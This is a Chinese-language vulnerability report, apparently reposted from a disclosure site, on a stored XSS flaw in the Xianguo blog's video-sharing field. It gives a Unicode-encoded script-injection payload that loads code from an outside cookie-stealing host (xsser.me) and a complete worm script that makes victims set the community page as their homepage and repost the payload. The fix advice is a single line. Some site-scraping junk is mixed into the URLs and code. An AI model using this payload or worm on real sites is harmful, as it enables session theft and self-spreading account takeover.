鲜果日志里面的分享视频和音乐中,可以通过插入一些跨站代码来实现XSS的效果,详见证明。
对用户进行持久控制,可以通过发一条含有跨站代码的日志,然后将鲜果社区设为我的鲜果首页,这样就可以实现对用户进行持久控制,这样用户每点登录一次鲜果就可以触发一次鲜果,一次又一次,一次又一次
演示地址:http://xianguo测试数据/1378148/ 首先我们来到分享视频的地方,我们随便写一个视频 ,保存,截包。 在video这个地方会发现一个神奇的东西,
%7B%22flashvar%22%3A%22OgYtHXq8oVw%22%2C%22flash%22%3A%22http%3A%2F%2FHdhCmsTesttudou测试数据%2Fv%2FOgYtHXq8oVw%2Fv.swf%22%2C%22imageurl%22%3A%22http%3A%2F%2Fi1.tdimg测试数据%2F118%2F195%2F384%2Fp.jpg'%20%2Clpic%20%3D%20%5C%22http%3A%2F%2Fi1.tdimg测试数据%2F118%2F195%2F384%2Fp.jpg%22%2C%22title%22%3A%22%E6%9D%A8%E5%B9%82%20%E5%88%98%E6%81%BA%E5%A8%81%20%E9%94%99%E6%80%AA%22%2C%22flag%22%3A1%2C%22url%22%3A%22http%3A%2F%2FHdhCmsTesttudou测试数据%2Fprograms%2Fview%2FOgYtHXq8oVw%22%7D 进行一下URIComp解码
{"flashvar":"OgYtHXq8oVw","flash":"http://HdhCmsTesttudou测试数据/v/OgYtHXq8oVw/v.swf","imageurl":"http://i1.tdimg测试数据/118/195/384/p.jpg' ,lpic = \"http://i1.tdimg测试数据/118/195/384/p.jpg","title":"杨幂 刘恺威 错怪","flag":1,"url":"http://HdhCmsTesttudou测试数据/programs/view/OgYtHXq8oVw"} 看到了我们很熟悉的{}这种类型,弱弱的表示不懂的专业术语是什么....... 然后将我们的跨站代码进行Unicode编码 "><script src=http://xsser.me/pIQKKz></script>
\u0022\u003E\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003D\u0068\u0074\u0074\u0070\u003A\u002f\u002f\u0078\u0073\u0073\u0065\u0072\u002e\u006d\u0065\u002f\u0070\u0049\u0051\u004b\u004b\u007a\u003E\u003C\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003E 然后将上面的编码插入到flash地址中
{"flashvar":"OgYtHXq8oVw","flash":"http://HdhCmsTesttudou测试数据/v/OgYtHXq8oVw/v.swf\u0022\u003E\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003D\u0068\u0074\u0074\u0070\u003A\u002f\u002f\u0078\u0073\u0073\u0065\u0072\u002e\u006d\u0065\u002f\u0070\u0049\u0051\u004b\u004b\u007a\u003E\u003C\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003E","imageurl":"http://i1.tdimg测试数据/118/195/384/p.jpg' ,lpic = \"http://i1.tdimg测试数据/118/195/384/p.jpg","title":"杨幂 刘恺威 错怪","flag":1,"url":"http://HdhCmsTesttudou测试数据/programs/view/OgYtHXq8oVw"} 进行URIComp编码
%7B%22flashvar%22%3A%22OgYtHXq8oVw%22%2C%22flash%22%3A%22http%3A%2F%2FHdhCmsTesttudou测试数据%2Fv%2FOgYtHXq8oVw%2Fv.swf%5Cu0022%5Cu003E%5Cu003C%5Cu0073%5Cu0063%5Cu0072%5Cu0069%5Cu0070%5Cu0074%5Cu0020%5Cu0073%5Cu0072%5Cu0063%5Cu003D%5Cu0068%5Cu0074%5Cu0074%5Cu0070%5Cu003A%5Cu002f%5Cu002f%5Cu0078%5Cu0073%5Cu0073%5Cu0065%5Cu0072%5Cu002e%5Cu006d%5Cu0065%5Cu002f%5Cu0070%5Cu0049%5Cu0051%5Cu004b%5Cu004b%5Cu007a%5Cu003E%5Cu003C%5Cu002f%5Cu0073%5Cu0063%5Cu0072%5Cu0069%5Cu0070%5Cu0074%5Cu003E%22%2C%22imageurl%22%3A%22http%3A%2F%2Fi1.tdimg测试数据%2F118%2F195%2F384%2Fp.jpg'%20%2Clpic%20%3D%20%5C%22http%3A%2F%2Fi1.tdimg测试数据%2F118%2F195%2F384%2Fp.jpg%22%2C%22title%22%3A%22%E6%9D%A8%E5%B9%82%20%E5%88%98%E6%81%BA%E5%A8%81%20%E9%94%99%E6%80%AA%22%2C%22flag%22%3A1%2C%22url%22%3A%22http%3A%2F%2FHdhCmsTesttudou测试数据%2Fprograms%2Fview%2FOgYtHXq8oVw%22%7D 然后替换掉原来的video中。
效果如下
COOKIES
其实拿到了COOKIES就可以登录了,但还是来说说持久控制。
var pkav={ ajax:function(){ var xmlHttp; try{ xmlHttp=new XMLHttpRequest(); }catch (e){ try{ xmlHttp=new ActiveXObject("Msxml2.XMLHTTP"); }catch (e){ try{ xmlHttp=new ActiveXObject("Microsoft.XMLHTTP"); } catch (e){ return false; } } } return xmlHttp; }, req:function(url,data,method,callback){ method=(method||"").toUpperCase(); method=method||"GET"; data=data||""; if(url){ var a=this.ajax(); a.open(method,url,true); if(method=="POST"){ a.setRequestHeader("Content-type","application/x-www-form-urlencoded"); } a.onreadystatechange=function(){ if (a.readyState==4 && a.status==200) { if(callback){ callback(a.responseText); } } }; if((typeof data)=="object"){ var arr=[]; for(var i in data){ arr.push(i+"="+encodeURIComponent(data[i])); } a.send(arr.join("&")); }else{ a.send(data||null); } } HdhCmsTest2cto测试数据 }, get:function(url,callback){ this.req(url,"","GET",callback); }, post:function(url,data,callback){ this.req(url,data,"POST",callback); } }; if(!window.__x){ pkav.post("http://xianguo测试数据/doings/sethome","type=snsSet",function(rs){}); pkav.post("http://xianguo测试数据/doings/addblog","videoKeyword=&tag-input=%E6%B7%BB%E5%8A%A0%E6%A0%87%E7%AD%BE%EF%BC%8C%E7%94%A8%E9%80%97%E5%8F%B7%E6%88%96%E5%9B%9E%E8%BD%A6%E5%88%86%E9%9A%94&tags=%255B%255D&video=%257B%2522flashvar%2522%253A%2522OgYtHXq8oVw%2522%252C%2522flash%2522%253A%2522http%253A%252F%252FHdhCmsTesttudou测试数据%252Fv%252FOgYtHXq8oVw%252Fv.swf%255Cu0022%255Cu003E%255Cu003C%255Cu0073%255Cu0063%255Cu0072%255Cu0069%255Cu0070%255Cu0074%255Cu0020%255Cu0073%255Cu0072%255Cu0063%255Cu003D%255Cu0068%255Cu0074%255Cu0074%255Cu0070%255Cu003A%255Cu002f%255Cu002f%255Cu0078%255Cu0073%255Cu0073%255Cu0065%255Cu0072%255Cu002e%255Cu006d%255Cu0065%255Cu002f%255Cu0070%255Cu0049%255Cu0051%255Cu004b%255Cu004b%255Cu007a%255Cu003E%255Cu003C%255Cu002f%255Cu0073%255Cu0063%255Cu0072%255Cu0069%255Cu0070%255Cu0074%255Cu003E%2522%252C%2522imageurl%2522%253A%2522http%253A%252F%252Fi1.tdimg测试数据%252F118%252F195%252F384%252Fp.jpg'%2520%252Clpic%2520%253D%2520%255C%2522http%253A%252F%252Fi1.tdimg测试数据%252F118%252F195%252F384%252Fp.jpg%2522%252C%2522title%2522%253A%2522%25E6%259D%25A8%25E5%25B9%2582%2520%25E5%2588%2598%25E6%2581%25BA%25E5%25A8%2581%2520%25E9%2594%2599%25E6%2580%25AA%2522%252C%2522flag%2522%253A1%252C%2522url%2522%253A%2522http%253A%252F%252FHdhCmsTesttudou测试数据%252Fprograms%252Fview%252FOgYtHXq8oVw%2522%257D&editorValue=%3Cp%3E%E9%BB%84%E9%87%91%E5%91%A8%E5%85%A8%E5%9B%BD80%E6%99%AF%E7%82%B9%E4%B8%8B%E8%B0%83%E7%A5%A8%E4%BB%B7%3C%2Fp%3E",function(rs){}); window.__x=1; }
第一个包是设置互动社区为首页 第二个包是发送一条微博
修复方案:加强过滤~~~~~~~~~
时间不足,不多打字了。。。
查看更多关于鲜果网Xss,可蠕虫,理论上可对用户持久控制的详细内容...